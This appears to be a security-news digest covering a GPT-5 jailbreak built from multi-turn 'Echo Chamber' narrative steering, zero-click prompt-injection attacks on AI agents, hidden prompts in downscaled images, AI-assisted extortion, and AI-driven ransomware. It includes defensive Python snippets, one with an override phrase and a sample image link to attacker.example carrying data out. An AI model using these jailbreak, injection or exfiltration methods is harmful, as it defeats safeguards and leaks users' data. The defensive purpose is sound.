
GPT-5 Jailbreak and Zero-Click AI Agent Attacks on Cloud and IoT Systems

📰 2 unique sources, 2 articles

Summary


Researchers have demonstrated a jailbreak technique that bypasses GPT-5's ethical guardrails, combining the Echo Chamber technique with narrative-driven steering to elicit harmful content. Separately, zero-click attacks against AI agents have been identified that target cloud and IoT systems by exploiting weaknesses in AI connectors and integrations. Echo Chamber manipulates GPT-5 by seeding a poisoned conversational context and then guiding the model with subtle storytelling, avoiding any explicit signal of intent; it has previously been combined with the Crescendo technique to bypass defenses in other AI models. Zero-click attacks such as AgentFlayer abuse AI agents connected to cloud services and code repositories, leading to data exfiltration and unauthorized access. Together, these findings underscore the risks of integrating AI models with external systems, which expands the attack surface and introduces new security vulnerabilities. Researchers at NeuralTrust jailbroke GPT-5 within 24 hours of its release using Echo Chamber combined with storytelling, demonstrating the continued susceptibility of LLMs to multi-turn attacks.
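
The multi-turn nature of Echo Chamber is precisely what lets it slip past filters that inspect each prompt in isolation. As one illustrative mitigation idea (not described in the research, and no guarantee against careful narrative steering), a chat gateway could run moderation over the accumulated conversation rather than only the latest message. The sketch below assumes the openai Python SDK; the helper names, model names, and refusal policy are placeholders, not a reference implementation.

```python
# Minimal sketch: moderate the accumulated conversation, not just the latest turn.
# Assumes the `openai` Python SDK (v1.x); helper names and policy are illustrative.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def conversation_is_flagged(messages: list[dict]) -> bool:
    """Run the moderation endpoint over the whole user-visible transcript.

    Single-turn filters can miss narrative steering that only becomes
    problematic in aggregate, so the full context is re-checked every turn.
    """
    transcript = "\n".join(
        f"{m['role']}: {m['content']}" for m in messages if m["role"] != "system"
    )
    result = client.moderations.create(
        model="omni-moderation-latest",
        input=transcript,
    )
    return result.results[0].flagged

def guarded_chat_turn(messages: list[dict], user_input: str) -> str:
    messages.append({"role": "user", "content": user_input})
    if conversation_is_flagged(messages):
        return "Conversation declined by policy."
    reply = client.chat.completions.create(model="gpt-5", messages=messages)
    content = reply.choices[0].message.content
    messages.append({"role": "assistant", "content": content})
    return content
```

Checking the full context raises the odds of catching gradual steering, but a narrative attack that never uses overtly unsafe language may still pass moderation, which is exactly the gap the NeuralTrust research highlights.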

Timeline

  1. 11.08.2025 19:46 📰 1 article

    GPT-5 Jailbreak Demonstrated Using Echo Chamber and Storytelling

    Researchers from NeuralTrust successfully jailbroke GPT-5 within 24 hours of its release using the Echo Chamber and Storytelling technique. The attack required only three turns and did not use unsafe language in the initial prompts. The technique leverages narrative continuity and urgency to bypass safety mechanisms, demonstrating the ongoing vulnerability of LLMs to multi-turn attacks. The Echo Chamber technique can also be applied to previous versions of OpenAI's GPT, Google's Gemini, and Grok-4. NeuralTrust has offered to share their findings with OpenAI to help address these vulnerabilities.

  2. 09.08.2025 18:06 📰 1 article

    GPT-5 Jailbreak and Zero-Click AI Agent Attacks Disclosed

    Researchers have uncovered a jailbreak technique for GPT-5 that leverages Echo Chamber and narrative-driven steering to produce harmful content. In parallel, zero-click attacks against AI agents targeting cloud and IoT systems have been identified. These attacks exploit vulnerabilities in AI connectors and integrations, leading to data exfiltration and unauthorized access; a defensive sketch for this class of attack follows the timeline.

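Zero-click attacks of the AgentFlayer type typically hide instructions inside documents that an AI agent later ingests from a connected store. The sources above do not describe specific mitigations; as a purely illustrative sketch, a connector could screen fetched documents for common hiding techniques (zero-width characters, markdown image links to external hosts that could exfiltrate data via URL parameters) before passing them to the model. The patterns and phrases below are assumptions, not a complete defense.

```python
# Illustrative pre-ingestion screen for documents fetched by an AI connector.
# The specific patterns are assumptions; real prompt-injection defenses need far
# more than regexes, but this shows where such a check would sit in the flow.
import re

ZERO_WIDTH = re.compile(r"[\u200b\u200c\u200d\u2060\ufeff]")
# Markdown image whose URL carries query parameters to an external host --
# a common exfiltration channel in indirect prompt-injection write-ups.
EXFIL_IMAGE = re.compile(r"!\[[^\]]*\]\(https?://[^)\s]+\?[^)\s]+\)")
SUSPICIOUS_PHRASES = ("ignore previous instructions", "do not tell the user")

def screen_document(text: str) -> list[str]:
    """Return a list of findings; an empty list means nothing obvious was seen."""
    findings = []
    if ZERO_WIDTH.search(text):
        findings.append("zero-width characters present (possible hidden text)")
    if EXFIL_IMAGE.search(text):
        findings.append("external image URL with query parameters (possible exfil)")
    lowered = text.lower()
    findings.extend(
        f"suspicious phrase: {p!r}" for p in SUSPICIOUS_PHRASES if p in lowered
    )
    return findings

if __name__ == "__main__":
    sample = "Quarterly report\u200b![](https://attacker.example/p.png?d=secrets)"
    for finding in screen_document(sample):
        print(finding)
```

Screening inbound content is only one layer; requiring explicit confirmation before an agent performs sensitive actions remains the more robust complementary control.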


Similar Happenings

HexStrike AI Exploits Citrix Vulnerabilities Disclosed in August 2025

Threat actors have begun using HexStrike AI to exploit Citrix vulnerabilities disclosed in August 2025. HexStrike AI, an AI-driven security platform designed to automate reconnaissance and vulnerability discovery for authorized red-team operations, has been repurposed for malicious activity. The exploitation attempts target three Citrix vulnerabilities, and some threat actors are offering access to vulnerable NetScaler instances for sale on darknet forums. Use of HexStrike AI sharply shortens the window between vulnerability disclosure and exploitation, increasing the risk of widespread attacks, and its automation enables continuous exploitation attempts, raising the likelihood of successful breaches. Security experts stress the urgency of patching and hardening affected systems to mitigate this AI-driven threat. The HexStrike AI client includes retry logic and recovery handling so that a failure in any individual step does not derail its multi-step operations. The tool has been open source on GitHub for about a month, where it has already garnered 1,800 stars and over 400 forks, and hackers began discussing it on hacking forums within hours of the Citrix disclosures. HexStrike AI has been used to automate the full exploitation chain, including scanning for vulnerable instances, crafting exploits, delivering payloads, and maintaining persistence. Check Point recommends that defenders focus on early warning through threat intelligence, AI-driven defenses, and adaptive detection.
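The point about retry logic and recovery handling is generic to any multi-step automation: if one stage of a long chain fails, the orchestrator retries or resumes instead of abandoning the run. The sketch below is not HexStrike AI's code; it is a minimal illustration, with invented stage names, of how retry-and-continue orchestration typically works.

```python
# Generic retry-and-continue orchestration; stage names are invented for
# illustration and bear no relation to HexStrike AI's implementation.
import time

def run_stage_with_retry(stage, max_attempts: int = 3, base_delay: float = 2.0):
    """Retry a stage with exponential backoff instead of failing the whole chain."""
    for attempt in range(1, max_attempts + 1):
        try:
            return stage()
        except Exception as exc:  # demo-level error handling
            if attempt == max_attempts:
                raise
            print(f"{stage.__name__} failed ({exc}); retrying (attempt {attempt + 1})")
            time.sleep(base_delay * 2 ** (attempt - 1))

def enumerate_assets():
    return ["203.0.113.10"]  # placeholder result

def flaky_stage():
    raise TimeoutError("transient network error")  # simulates a failing step

if __name__ == "__main__":
    assets = run_stage_with_retry(enumerate_assets)
    try:
        run_stage_with_retry(flaky_stage)
    except TimeoutError:
        print("stage ultimately failed; the chain would resume later rather than abort")
```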

AI-Powered Cyberattacks Targeting Critical Sectors Disrupted

Anthropic disrupted an AI-powered operation in July 2025 that used its Claude AI chatbot to conduct large-scale theft and extortion across 17 organizations in healthcare, emergency services, government, and religious sectors. The actor used Claude Code on Kali Linux to automate various phases of the attack cycle, including reconnaissance, credential harvesting, and network penetration. The operation, codenamed GTG-2002, employed AI to make tactical and strategic decisions, exfiltrating sensitive data and demanding ransoms ranging from $75,000 to $500,000 in Bitcoin. The actor used AI to craft bespoke versions of the Chisel tunneling utility to evade detection and disguise malicious executables as legitimate Microsoft tools. The operation highlights the increasing use of AI in cyberattacks, making defense and enforcement more challenging. Anthropic developed new detection methods to prevent future abuse of its AI models.

AI-Driven Ransomware Strain PromptLock Discovered

A new ransomware strain named PromptLock has been identified by ESET researchers. It leverages AI to generate malicious scripts in real time, making it harder to detect and defend against. PromptLock is still in development and has not been observed in active attacks; it can exfiltrate files and encrypt data, and a file-destruction capability is reportedly being added. The ransomware uses OpenAI's gpt-oss:20b model via the Ollama API and is written in Go, targeting Windows, Linux, and macOS systems. The Bitcoin address associated with PromptLock appears to belong to Satoshi Nakamoto. PromptLock uses Lua scripts generated from hard-coded prompts to enumerate the local filesystem, inspect target files, exfiltrate selected data, and perform encryption. It can generate custom ransom notes based on the type of infected machine and locks files with the SPECK 128-bit encryption algorithm. PromptLock is assessed to be a proof of concept (PoC) rather than fully operational malware deployed in the wild.
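Because PromptLock drives a locally hosted model through the Ollama API, one simple triage idea (not from ESET's write-up) is to check endpoints for an unexpected Ollama service and for the gpt-oss:20b model being present. The sketch below uses Ollama's default port and its /api/tags model-listing endpoint; treat it as a heuristic starting point, since malware could also reach a model hosted elsewhere.

```python
# Quick triage: is an Ollama service answering locally, and does it host gpt-oss:20b?
# The port and endpoint are Ollama's documented defaults; this is a heuristic,
# not a detection of PromptLock itself.
import requests

OLLAMA_TAGS_URL = "http://127.0.0.1:11434/api/tags"
MODEL_OF_INTEREST = "gpt-oss:20b"

def check_local_ollama(timeout: float = 2.0) -> None:
    try:
        resp = requests.get(OLLAMA_TAGS_URL, timeout=timeout)
        resp.raise_for_status()
    except requests.RequestException:
        print("No Ollama service answering on the default port.")
        return
    models = [m.get("name", "") for m in resp.json().get("models", [])]
    print(f"Ollama is running; local models: {models or 'none'}")
    if any(name.startswith(MODEL_OF_INTEREST) for name in models):
        print(f"Note: {MODEL_OF_INTEREST} is present; verify it is expected on this host.")

if __name__ == "__main__":
    check_local_ollama()
```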

AI Systems Vulnerable to Data Theft via Hidden Prompts in Downscaled Images

Researchers at Trail of Bits have demonstrated a new attack that exploits image downscaling in AI systems to steal user data. Prompts hidden in full-resolution images become legible only when the image is downscaled with specific resampling algorithms; the AI model then interprets the revealed text as part of the user's instructions and executes it without the user's knowledge, potentially leading to data leakage or unauthorized actions. The vulnerability affects multiple AI systems, including Google Gemini CLI, Vertex AI Studio, Google Assistant on Android, and Genspark. The researchers have released an open-source tool, Anamorpher, for crafting images to test the vulnerability. To mitigate the risk, Trail of Bits recommends restricting the dimensions of image uploads, showing users a preview of the downscaled image, and requiring explicit user confirmation for sensitive tool calls.
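Two of the mitigations Trail of Bits recommends, dimension limits and showing the user the downscaled image the model will actually see, are straightforward to prototype. The sketch below uses Pillow; the size limit, target resolution, and choice of bicubic resampling are assumptions, and in practice the preview must use the same resampling algorithm as the target AI pipeline, since the hidden prompt only emerges under specific algorithms.

```python
# Sketch of two mitigations from the Trail of Bits recommendations:
# reject oversized uploads and render the downscaled preview the model would see.
# MAX_DIM, MODEL_INPUT_SIZE, and BICUBIC resampling are illustrative assumptions.
from PIL import Image

MAX_DIM = 1024                  # reject anything larger than this on either axis
MODEL_INPUT_SIZE = (512, 512)   # what the downstream pipeline resamples to

def prepare_image(path: str, preview_path: str) -> Image.Image:
    img = Image.open(path)
    if max(img.size) > MAX_DIM:
        raise ValueError(f"image {img.size} exceeds allowed dimension of {MAX_DIM}px")
    # Resample exactly as the AI pipeline would, so any content that only
    # emerges at low resolution is visible to the user before submission.
    preview = img.resize(MODEL_INPUT_SIZE, Image.Resampling.BICUBIC)
    preview.save(preview_path)
    return preview

if __name__ == "__main__":
    prepare_image("upload.png", "what_the_model_sees.png")
```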

UNC5518 Deploys CORNFLAKE.V3 Backdoor via ClickFix and Fake CAPTCHA Pages

UNC5518, an access-as-a-service threat actor, deploys the CORNFLAKE.V3 backdoor using the ClickFix social engineering tactic and fake CAPTCHA pages. This backdoor is used by at least two other groups, UNC5774 and UNC4108, to initiate multi-stage infections and drop additional payloads. The attack begins with users being tricked into running a malicious PowerShell script via a fake CAPTCHA page. The script executes a dropper payload that ultimately launches CORNFLAKE.V3, which supports various payload types and collects system information. The backdoor has been observed in both JavaScript and PHP versions and uses Cloudflare tunnels to avoid detection. A new ClickFix variant manipulates AI-generated text summaries to deliver malicious commands, turning AI tools into active participants in social engineering attacks.
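The article does not prescribe detections, but ClickFix-style lures rely on the victim pasting a command into the Windows Run dialog, and Windows records those entries under the RunMRU registry key. As a Windows-only triage sketch (the key path is the standard Explorer location; the filtering keywords are assumptions, not a signature), recent Run-dialog entries can be dumped and reviewed for PowerShell one-liners.

```python
# Windows-only triage: list recent Run-dialog entries (RunMRU), where ClickFix-style
# lures leave the pasted command. The keywords below are illustrative, not a signature.
import winreg

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
KEYWORDS = ("powershell", "mshta", "curl", "bitsadmin")

def dump_runmru() -> None:
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH)
    except FileNotFoundError:
        print("No RunMRU key found (the Run dialog may never have been used).")
        return
    _, value_count, _ = winreg.QueryInfoKey(key)
    for i in range(value_count):
        name, data, _ = winreg.EnumValue(key, i)
        if name == "MRUList":  # ordering metadata, not a command
            continue
        flag = " <-- review" if any(k in str(data).lower() for k in KEYWORDS) else ""
        print(f"{name}: {data}{flag}")
    winreg.CloseKey(key)

if __name__ == "__main__":
    dump_runmru()
```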